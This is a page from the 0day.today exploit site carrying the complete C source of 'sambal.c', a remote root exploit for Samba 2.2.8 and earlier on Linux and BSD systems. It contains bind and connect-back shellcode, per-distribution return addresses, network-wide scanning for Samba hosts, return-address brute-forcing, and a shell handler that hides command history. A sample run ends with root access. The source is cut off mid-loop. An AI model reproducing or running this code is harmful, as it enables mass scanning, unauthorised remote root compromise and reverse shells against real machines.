0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Samba 2.2.8 Remote Root Exploit - sambal.c
========================================== Samba 2.2.8 Remote Root Exploit - sambal.c ========================================== /* Remote root exploit for Samba 2.2.x and prior that works against Linux (all distributions), FreeBSD (4.x, 5.x), NetBSD (1.x) and OpenBSD (2.x, 3.x and 3.2 non-executable stack). sambal.c is able to identify samba boxes. It will send a netbios name packet to port 137. If the box responds with the mac address 00-00-00-00-00-00, it's probally running samba. [esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0 samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be) -------------------------------------------------------------- + Scan mode. + [192.168.0.3] Samba + [192.168.0.10] Windows + [192.168.0.20] Windows + [192.168.0.21] Samba + [192.168.0.30] Windows + [192.168.0.31] Samba + [192.168.0.33] Windows + [192.168.0.35] Windows + [192.168.0.36] Windows + [192.168.0.37] Windows ... + [192.168.0.133] Samba Great! You could now try a preset (-t0 for a list), but most of the time bruteforce will do. The smbd spawns a new process on every connect, so we can bruteforce the return address... [esdee@embrace esdee]$ ./sambal -b 0 -v 192.168.0.133 samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be) -------------------------------------------------------------- + Verbose mode. + Bruteforce mode. (Linux) + Using ret: [0xbffffed4] + Using ret: [0xbffffda8] + Using ret: [0xbffffc7c] + Using ret: [0xbffffb50] + Using ret: [0xbffffa24] + Using ret: [0xbffff8f8] + Using ret: [0xbffff7cc] + Worked! -------------------------------------------------------------- Linux LittleLinux.selwerd.lan 2.4.18-14 #1 Wed Sep 4 11:57:57 EDT 2002 i586 i586 i386 GNU/Linux uid=0(root) gid=0(root) groups=99(nobody) sambal.c : samba-2.2.8 < remote root exploit by eSDee (www.netric.org| */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <netdb.h> #include <errno.h> #include <fcntl.h> #include <signal.h> #include <string.h> #include <unistd.h> #include <sys/select.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/time.h> #include <sys/wait.h> #include <netinet/in.h> #include <arpa/inet.h> typedef struct { unsigned char type; unsigned char flags; unsigned short length; } NETBIOS_HEADER; typedef struct { unsigned char protocol[4]; unsigned char command; unsigned short status; unsigned char reserved; unsigned char flags; unsigned short flags2; unsigned char pad[12]; unsigned short tid; unsigned short pid; unsigned short uid; unsigned short mid; } SMB_HEADER; int OWNED = 0; pid_t childs[100]; struct sockaddr_in addr1; struct sockaddr_in addr2; char linux_bindcode[] = "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51" "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50" "\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02" "\x52\x51\x89\xca\x89\xe1\xb0\x66\xcd\x80\x31\xdb\x39\xc3\x74\x05" "\x31\xc0\x40\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb3\x04\xb0\x66\xcd" "\x80\x89\xd7\x31\xc0\x31\xdb\x31\xc9\xb3\x11\xb1\x01\xb0\x30\xcd" "\x80\x31\xc0\x31\xdb\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80" "\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x40\x31\xc0" "\x89\xfb\xb0\x06\xcd\x80\x31\xc0\x31\xc9\x89\xf3\xb0\x3f\xcd\x80" "\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0" "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8b\x54\x24" "\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0" "\x89\xf3\xb0\x06\xcd\x80\xeb\x99"; char bsd_bindcode[] = "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0" "\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02" "\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80" "\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57" "\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89" "\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50" "\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80" "\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56" "\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd" "\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f" "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b" "\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80" "\xeb\x9a"; char linux_connect_back[] = "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51" "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51" "\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3" "\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1" "\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" "\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f" "\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80"; char bsd_connect_back[] = "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0" "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef" "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0" "\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80" "\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52" "\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31" "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54" "\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"; struct { char *type; unsigned long ret; char *shellcode; int os_type; /* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec stack */ } targets[] = { { "samba-2.2.x - Debian 3.0 ", 0xbffffea2, linux_bindcode, 0 }, { "samba-2.2.x - Gentoo 1.4.x ", 0xbfffe890, linux_bindcode, 0 }, { "samba-2.2.x - Mandrake 8.x ", 0xbffff6a0, linux_bindcode, 0 }, { "samba-2.2.x - Mandrake 9.0 ", 0xbfffe638, linux_bindcode, 0 }, { "samba-2.2.x - Redhat 9.0 ", 0xbffff7cc, linux_bindcode, 0 }, { "samba-2.2.x - Redhat 8.0 ", 0xbffff2f0, linux_bindcode, 0 }, { "samba-2.2.x - Redhat 7.x ", 0xbffff310, linux_bindcode, 0 }, { "samba-2.2.x - Redhat 6.x ", 0xbffff2f0, linux_bindcode, 0 }, { "samba-2.2.x - Slackware 9.0 ", 0xbffff574, linux_bindcode, 0 }, { "samba-2.2.x - Slackware 8.x ", 0xbffff574, linux_bindcode, 0 }, { "samba-2.2.x - SuSE 7.x ", 0xbffffbe6, linux_bindcode, 0 }, { "samba-2.2.x - SuSE 8.x ", 0xbffff8f8, linux_bindcode, 0 }, { "samba-2.2.x - FreeBSD 5.0 ", 0xbfbff374, bsd_bindcode, 1 }, { "samba-2.2.x - FreeBSD 4.x ", 0xbfbff374, bsd_bindcode, 1 }, { "samba-2.2.x - NetBSD 1.6 ", 0xbfbfd5d0, bsd_bindcode, 1 }, { "samba-2.2.x - NetBSD 1.5 ", 0xbfbfd520, bsd_bindcode, 1 }, { "samba-2.2.x - OpenBSD 3.2 ", 0x00159198, bsd_bindcode, 2 }, { "samba-2.2.8 - OpenBSD 3.2 (package)", 0x001dd258, bsd_bindcode, 2 }, { "samba-2.2.7 - OpenBSD 3.2 (package)", 0x001d9230, bsd_bindcode, 2 }, { "samba-2.2.5 - OpenBSD 3.2 (package)", 0x001d6170, bsd_bindcode, 2 }, { "Crash (All platforms) ", 0xbade5dee, linux_bindcode, 0 }, }; void shell(); void usage(); void handler(); int is_samba(char *ip, unsigned long time_out); int Connect(int fd, char *ip, unsigned int port, unsigned int time_out); int read_timer(int fd, unsigned int time_out); int write_timer(int fd, unsigned int time_out); int start_session(int sock); int exploit_normal(int sock, unsigned long ret, char *shellcode); int exploit_openbsd32(int sock, unsigned long ret, char *shellcode); void usage(char *prog) { fprintf(stderr, "Usage: %s [-bBcCdfprsStv] [host]\n\n" "-b <platform> bruteforce (0 = Linux, 1 = FreeBSD/Net BSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\n" "-B <step> bruteforce steps (default = 300)\n" "-c <ip address> connectback ip address\n" "-C <max childs> max childs for scan/bruteforce mode (d efault = 40)\n" "-d <delay> bruteforce/scanmode delay in micro sec onds (default = 100000)\n" "-f force\n" "-p <port> port to attack (default = 139)\n" "-r <ret> return address\n" "-s scan mode (random)\n" "-S <network> scan mode\n" "-t <type> presets (0 for a list)\n" "-v verbose mode\n\n", prog); exit(1); } int is_samba(char *ip, unsigned long time_out) { char nbtname[]= /* netbios name packet */ { 0x80,0xf0,0x00,0x10,0x00,0x01,0x00,0x00, 0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41, 0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41, 0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21, 0x00,0x01 }; unsigned char recv_buf[1024]; unsigned char *ptr; int i = 0; int s = 0; unsigned int total = 0; if ((s = socket(PF_INET, SOCK_DGRAM, 17)) <= 0) return -1; if(Connect(s, ip, 137, time_out) == -1) { close(s); return -1; } memset(recv_buf, 0x00, sizeof(recv_buf)); if(write_timer(s, time_out) == 1) { if (write(s, nbtname, sizeof(nbtname)) <= 0) { close(s); return -1; } } if (read_timer(s, time_out) == 1) { if (read(s, recv_buf, sizeof(recv_buf)) <= 0) { close(s); return -1; } ptr = recv_buf + 57; total = *(ptr - 1); /* max names */ while(ptr < recv_buf + sizeof(recv_buf)) { ptr += 18; if (i == total) { ptr -= 19; if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 & & *(ptr + 3) == 0x00 && *(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 & & *(ptr + 6) == 0x00) { close(s); return 0; } close(s); return 1; } i++; } } close(s); return -1; } int Connect(int fd, char *ip, unsigned int port, unsigned int time_out) { /* ripped from no1 */ int flags; int select_status; fd_set connect_read, connect_write; struct timeval timeout; int getsockopt_length = 0; int getsockopt_error = 0; struct sockaddr_in server; bzero(&server, sizeof(server)); server.sin_family = AF_INET; inet_pton(AF_INET, ip, &server.sin_addr); server.sin_port = htons(port); if((flags = fcntl(fd, F_GETFL, 0)) < 0) { close(fd); return -1; } if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) { close(fd); return -1; } timeout.tv_sec = time_out; timeout.tv_usec = 0; FD_ZERO(&connect_read); FD_ZERO(&connect_write); FD_SET(fd, &connect_read); FD_SET(fd, &connect_write); if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) { if(errno != EINPROGRESS) { close(fd); return -1; } } else { if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } select_status = select(fd + 1, &connect_read, &connect_write, NULL, &ti meout); if(select_status == 0) { close(fd); return -1; } if(select_status == -1) { close(fd); return -1; } if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) { if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write)) { getsockopt_length = sizeof(getsockopt_error); if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_err or, &getsockopt_length) < 0) { errno = ETIMEDOUT; close(fd); return -1; } if(getsockopt_error == 0) { if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } else { errno = getsockopt_error; close(fd); return (-1); } } } else { close(fd); return 1; } if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } int read_timer(int fd, unsigned int time_out) { /* ripped from no1 */ int flags; int select_status; fd_set fdread; struct timeval timeout; if((flags = fcntl(fd, F_GETFL, 0)) < 0) { close(fd); return (-1); } if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) { close(fd); return (-1); } timeout.tv_sec = time_out; timeout.tv_usec = 0; FD_ZERO(&fdread); FD_SET(fd, &fdread); select_status = select(fd + 1, &fdread, NULL, NULL, &timeout); if(select_status == 0) { close(fd); return (-1); } if(select_status == -1) { close(fd); return (-1); } if(FD_ISSET(fd, &fdread)) { if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } else { close(fd); return 1; } } int write_timer(int fd, unsigned int time_out) { /* ripped from no1 */ int flags; int select_status; fd_set fdwrite; struct timeval timeout; if((flags = fcntl(fd, F_GETFL, 0)) < 0) { close(fd); return (-1); } if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) { close(fd); return (-1); } timeout.tv_sec = time_out; timeout.tv_usec = 0; FD_ZERO(&fdwrite); FD_SET(fd, &fdwrite); select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout); if(select_status == 0) { close(fd); return -1; } if(select_status == -1) { close(fd); return -1; } if(FD_ISSET(fd, &fdwrite)) { if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } else { close(fd); return -1; } } void shell(int sock) { fd_set fd_read; char buff[1024], *cmd="unset HISTFILE; echo \"*** JE MOET JE MUIL HOUWE \";uname -a;id;\n"; int n; FD_ZERO(&fd_read); FD_SET(sock, &fd_read); FD_SET(0, &fd_read); send(sock, cmd, strlen(cmd), 0); while(1) { FD_SET(sock,&fd_read); FD_SET(0,&fd_read); if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break; if (FD_ISSET(sock, &fd_read)) { if((n = recv(sock, buff, sizeof(buff), 0)) < 0){ fprintf(stderr, "EOF\n"); exit(2); } if (write(1, buff, n) < 0) break; } if (FD_ISSET(0, &fd_read)) { if((n = read(0, buff, sizeof(buff))) < 0){ fprintf(stderr, "EOF\n"); exit(2); } if (send(sock, buff, n, 0) < 0) break; } usleep(10); } fprintf(stderr, "Connection lost.\n\n"); exit(0); } void handler() { int sock = 0; int i = 0; OWNED = 1; for (i = 0; i < 100; i++) if (childs[i] != 0xffffffff) waitpid(childs[i], NULL, 0); if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) { close(sock); exit(1); } if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) { fprintf(stdout, "+ Worked!\n" "---------------------------------------------- ----------------\n"); shell(sock); close(sock); } } int start_session(int sock) { char buffer[1000]; char response[4096]; char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00 \x00\x00\x00"; char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25 \x6e\x6f\x62\x6f\x64\x79" "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24 "; NETBIOS_HEADER *netbiosheader; SMB_HEADER *smbheader; memset(buffer, 0x00, sizeof(buffer)); netbiosheader = (NETBIOS_HEADER *)buffer; smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); netbiosheader->type = 0x00; /* session message */ netbiosheader->flags = 0x00; netbiosheader->length = htons(0x2E); smbheader->protocol[0] = 0xFF; smbheader->protocol[1] = 'S'; smbheader->protocol[2] = 'M'; smbheader->protocol[3] = 'B'; smbheader->command = 0x73; /* session setup */ smbheader->flags = 0x08; /* caseless pathnames */ smbheader->flags2 = 0x01; /* long filenames supported */ smbheader->pid = getpid() & 0xFFFF; smbheader->uid = 100; smbheader->mid = 0x01; memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_da ta1, sizeof(session_data1) - 1); if(write_timer(sock, 3) == 1) if (send(sock, buffer, 50, 0) < 0) return -1; memset(response, 0x00, sizeof(response)); if (read_timer(sock, 3) == 1) if (read(sock, response, sizeof(response) - 1) < 0) return -1; netbiosheader = (NETBIOS_HEADER *)response; smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER)); if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non sess ion message\n"); netbiosheader = (NETBIOS_HEADER *)buffer; smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); memset(buffer, 0x00, sizeof(buffer)); netbiosheader->type = 0x00; /* session message */ netbiosheader->flags = 0x00; netbiosheader->length = htons(0x3C); smbheader->protocol[0] = 0xFF; smbheader->protocol[1] = 'S'; smbheader->protocol[2] = 'M'; smbheader->protocol[3] = 'B'; smbheader->command = 0x70; /* start connection */ smbheader->pid = getpid() & 0xFFFF; smbheader->tid = 0x00; smbheader->uid = 100; memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_da ta2, sizeof(session_data2) - 1); if(write_timer(sock, 3) == 1) if (send(sock, buffer, 64, 0) < 0) return -1; memset(response, 0x00, sizeof(response)); if (read_timer(sock, 3) == 1) if (read(sock, response, sizeof(response) - 1) < 0) return -1; netbiosheader = (NETBIOS_HEADER *)response; smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER)); if (netbiosheader->type != 0x00) return -1; return 0; } int exploit_normal(int sock, unsigned long ret, char *shellcode) { char buffer[4000]; char exploit_data[] = "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00" "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x 00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00" "\x00\x00\x00\x90"; int i = 0; unsigned long dummy = ret - 0x90; NETBIOS_HEADER *netbiosheader; SMB_HEADER *smbheader; memset(buffer, 0x00, sizeof(buffer)); netbiosheader = (NETBIOS_HEADER *)buffer; smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); netbiosheader->type = 0x00; /* session message */ netbiosheader->flags = 0x04; netbiosheader->length = htons(2096); smbheader->protocol[0] = 0xFF; smbheader->protocol[1] = 'S'; smbheader->protocol[2] = 'M'; smbheader->protocol[3] = 'B'; smbheader->command = 0x32; /* SMBtrans2 */ smbheader->tid = 0x01; smbheader->uid = 100; memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(ex ploit_data), 0x90, 3000); buffer[1096] = 0xEB; buffer[1097] = 0x70; for (i = 0; i < 4 * 24; i += 8) { memcpy(buffer + 1099 + i, &dummy, 4); memcpy(buffer + 1103 + i, &ret, 4); } memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), exploit_data, sizeof(exploit_data) - 1); memcpy(buffer + 1800, shellcode, strlen(shellcode)); if(write_timer(sock, 3) == 1) { if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1; return 0; } return -1; } int exploit_openbsd32(int sock, unsigned long ret, char *shellcode) { char buffer[4000]; char exploit_data[] = "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00" "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x 00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00" "\x00\x00\x00\x90"; int i = 0; unsigned long dummy = ret - 0x30; NETBIOS_HEADER *netbiosheader; SMB_HEADER *smbheader; memset(buffer, 0x00, sizeof(buffer)); netbiosheader = (NETBIOS_HEADER *)buffer; smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); netbiosheader->type = 0x00; /* session message */ netbiosheader->flags = 0x04; netbiosheader->length = htons(2096); smbheader->protocol[0] = 0xFF; smbheader->protocol[1] = 'S'; smbheader->protocol[2] = 'M'; smbheader->protocol[3] = 'B'; smbheader->command = 0x32; /* SMBtrans2 */ smbheader->tid = 0x01; smbheader->uid = 100; memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(ex ploit_data), 0x90, 3000); for (i = 0; i < 4 * 24; i += 4) memcpy(buffer + 1131 + i, &dummy, 4); memcpy(buffer + 1127, &ret, 4); memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), exploit_data, sizeof(exploit_data) - 1); memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode)) ; if(write_timer(sock, 3) == 1) { if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1; return 0; } return -1; } int main (int argc,char *argv[]) { char *shellcode = NULL; char scan_ip[256]; int brute = -1; int connectback = 0; int force = 0; int i = 0; int ip1 = 0; int ip2 = 0; int ip3 = 0; int ip4 = 0; int opt = 0; int port = 139; int random = 0; int scan = 0; int sock = 0; int sock2 = 0; int status = 0; int type = 0; int verbose = 0; unsigned long BRUTE_DELAY = 100000; unsigned long ret = 0x0; unsigned long MAX_CHILDS = 40; unsigned long STEPS = 300; struct hostent *he; fprintf(stdout, "samba-2.2.8 < remote root exploit by eSDee (www.netric .org|be)\n" "------------------------------------------------------ --------\n"); while((opt = getopt(argc,argv,"b:B:c:C:d:fp:r:sS:t:v")) !=EOF) { switch(opt) { case 'b': brute = atoi(optarg); if ((brute < 0) || (brute > 3)) { fprintf(stderr, "Invalid platform.\n\n" ); return -1; } break; case 'B': STEPS = atoi(optarg); if (STEPS == 0) STEPS++; break; case 'c': sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4); connectback = 1; if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == 0) { fprintf(stderr, "Invalid IP address.\n\ n"); return -1; } linux_connect_back[33] = ip1; bsd_connect_back[ 24] = ip1; linux_connect_back[34] = ip2; bsd_connect_back[ 25] = ip2; linux_connect_back[35] = ip3; bsd_connect_back[ 26] = ip3; linux_connect_back[36] = ip4; bsd_connect_back[ 27] = ip4; break; case 'C': MAX_CHILDS = atoi(optarg); if (MAX_CHILDS == 0) { fprintf(stderr, "Invalid number of chil ds.\n"); return -1; } if (MAX_CHILDS > 99) { fprintf(stderr, "Too many childs, using 99. \n"); MAX_CHILDS = 99; } break; case 'd': BRUTE_DELAY = atoi(optarg); break; case 'f': force = 1; break; case 'p': port = atoi(optarg); if ((port <= 0) || (port > 65535)) { fprintf(stderr, "Invalid port.\n\n"); return -1; } break; case 'r': ret = strtoul(optarg, &optarg, 16); break; case 's': random = 1; scan = 1; break; case 'S': random = 0; scan = 1; sscanf(optarg, "%d.%d.%d", &ip1, &ip2, &ip3); ip3--; break; case 't': type = atoi(optarg); if (type == 0 || type > sizeof(targets) / 16) { for(i = 0; i < sizeof(targets) / 16; i+ +) fprintf(stdout, "%02d. %s [0x%08x]\n", i + 1, targets[i].type , (unsigned int) targets[i].ret); fprintf(stderr, "\n"); return -1; } break; case 'v': verbose = 1; break; default: usage(argv[0] == NULL ? "sambal" : argv[0]); break; } } if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && scan == 0)) usage(argv[0] == NULL ? "sambal" : argv[0]); if (scan == 1) fprintf(stdout, "+ Scan mode.\n"); if (verbose == 1) fprintf(stdout, "+ Verbose mode.\n"); if (scan == 1) { srand(getpid()); while (1) { if (random == 1) { ip1 = rand() % 255; ip2 = rand() % 255; ip3 = rand() % 255; } else { ip3++; if (ip3 > 254) { ip3 = 1; ip2++; } if (ip2 > 254) { ip2 = 1; ip1++; } if (ip1 > 254) exit(0); } for (ip4 = 0; ip4 < 255; ip4++) { i++; snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.% u.%u", ip1, ip2, ip3, ip4); usleep(BRUTE_DELAY); switch (fork()) { case 0: switch(is_samba(scan_ip, 2)) { case 0: fprintf(stdout, "+ [%s] Samba\n", scan_ip); break; case 1: fprintf(stdout, "+ [%s] Windows\n", scan_ip); break; default: break; } exit(0); break; case -1: fprintf(stderr, "+ fork() error \n"); exit(-1); break; default: if (i > MAX_CHILDS - 2) { wait(&status); i--; } break; } } } return 0; } he = gethostbyname(argv[optind]); if (he == NULL) { fprintf(stderr, "Unable to resolve %s...\n", argv[optind]); return -1; } if (brute == -1) { if (ret == 0) ret = targets[type - 1].ret; shellcode = targets[type - 1].shellcode; if (connectback == 1) { fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:452 95]\n", ip1, ip2, ip3, ip4); switch(targets[type - 1].os_type) { case 0: /* linux */ shellcode = linux_connect_back; break; case 1: /* FreeBSD/NetBSD */ shellcode = bsd_connect_back; break; case 2: /* OpenBSD */ shellcode = bsd_connect_back; break; case 3: /* OpenBSD 3.2 Non-exec stack */ shellcode = bsd_connect_back; break; } } if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) { fprintf(stderr, "+ socket() error.\n"); return -1; } if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) { fprintf(stderr, "+ socket() error.\n"); return -1; } memcpy(&addr1.sin_addr, he->h_addr, he->h_length); memcpy(&addr2.sin_addr, he->h_addr, he->h_length); addr1.sin_family = AF_INET; addr1.sin_port = htons(port); addr2.sin_family = AF_INET; addr2.sin_port = htons(45295); if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) { fprintf(stderr, "+ connect() error.\n"); return -1; } if (verbose == 1) fprintf(stdout, "+ %s\n", targets[type - 1].t ype); if (force == 0) { if (is_samba(argv[optind], 2) != 0) { fprintf(stderr, "+ Host is not running samba!\n \n"); return -1; } fprintf(stderr, "+ Host is running samba.\n"); } if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", ( char *)inet_ntoa(addr1.sin_addr), port); if (start_session(sock) < 0) fprintf(stderr, "+ Session failed. \n"); if (verbose == 1) fprintf(stdout, "+ Session enstablished\n"); sleep(5); if (targets[type - 1].os_type != 2) { if (exploit_normal(sock, ret, shellcode) < 0) { fprintf(stderr, "+ Failed.\n"); close(sock); } } else { if (exploit_openbsd32(sock, ret, shellcode) < 0) { fprintf(stderr, "+ Failed.\n"); close(sock); } } sleep(2); if (connectback == 0) { if(connect(sock2, (struct sockaddr *)&addr2, sizeof(add r2)) == -1) { fprintf(stderr, "+ Exploit failed, try -b to br uteforce.\n"); return -1; } fprintf(stdout, "-------------------------------------- ------------------------\n"); shell(sock2); close(sock); close(sock2); } else { fprintf(stdout, "+ Done...\n"); close(sock2); close(sock); } return 0; } signal(SIGPIPE, SIG_IGN); signal(SIGUSR1, handler); switch(brute) { case 0: if (ret == 0) ret = 0xc0000000; shellcode = linux_bindcode; fprintf(stdout, "+ Bruteforce mode. (Linux)\n"); break; case 1: if (ret == 0) ret = 0xbfc00000; shellcode = bsd_bindcode; fprintf(stdout, "+ Bruteforce mode. (FreeBSD / NetBSD)\ n"); break; case 2: if (ret == 0) ret = 0xdfc00000; shellcode = bsd_bindcode; fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.1 and pr ior)\n"); break; case 3: if (ret == 0) ret = 0x00170000; shellcode = bsd_bindcode; fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.2 - non- exec stack)\n"); break; } memcpy(&addr1.sin_addr, he->h_addr, he->h_length); memcpy(&addr2.sin_addr, he->h_addr, he->h_length); addr1.sin_family = AF_INET; addr1.sin_port = htons(port); addr2.sin_family = AF_INET; addr2.sin_port = htons(45295); for (i = 0; i < 100; i++) childs[i] = -1; i = 0; if (force == 0) { if (is_samba(argv[optind], 2) != 0) { fprintf(stderr, "+ Host is not running samba!\n\n"); return -1; } fprintf(stderr, "+ Host is running samba.\n"); } while (OWNED == 